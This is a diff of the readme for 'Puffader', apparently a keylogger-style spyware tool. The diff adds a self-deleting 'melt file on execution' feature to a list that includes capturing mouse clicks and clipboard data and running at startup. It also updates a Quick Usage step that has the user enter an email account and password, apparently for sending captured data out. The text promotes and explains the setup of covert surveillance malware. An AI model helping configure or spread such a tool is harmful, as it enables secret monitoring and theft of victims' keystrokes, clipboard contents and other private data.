xp4xbox/Puffader/readme.md

 * Ability to capture window mouse clicks
 * Ability to run at startup
 * Ability to capture clipboard data
+* Ability to melt file on execution
 * Checking for multiple instances
 * And more...

 ## Quick Usage

 1. Open file with idle or any other editor.
-2. Modifiy lines `23-48` for your personal preference: eg.
+2. Modifiy lines `23-49` for your personal preference: eg.
 ```
 strEmailAc = "email@gmail.com"
 strEmailPass = "pass"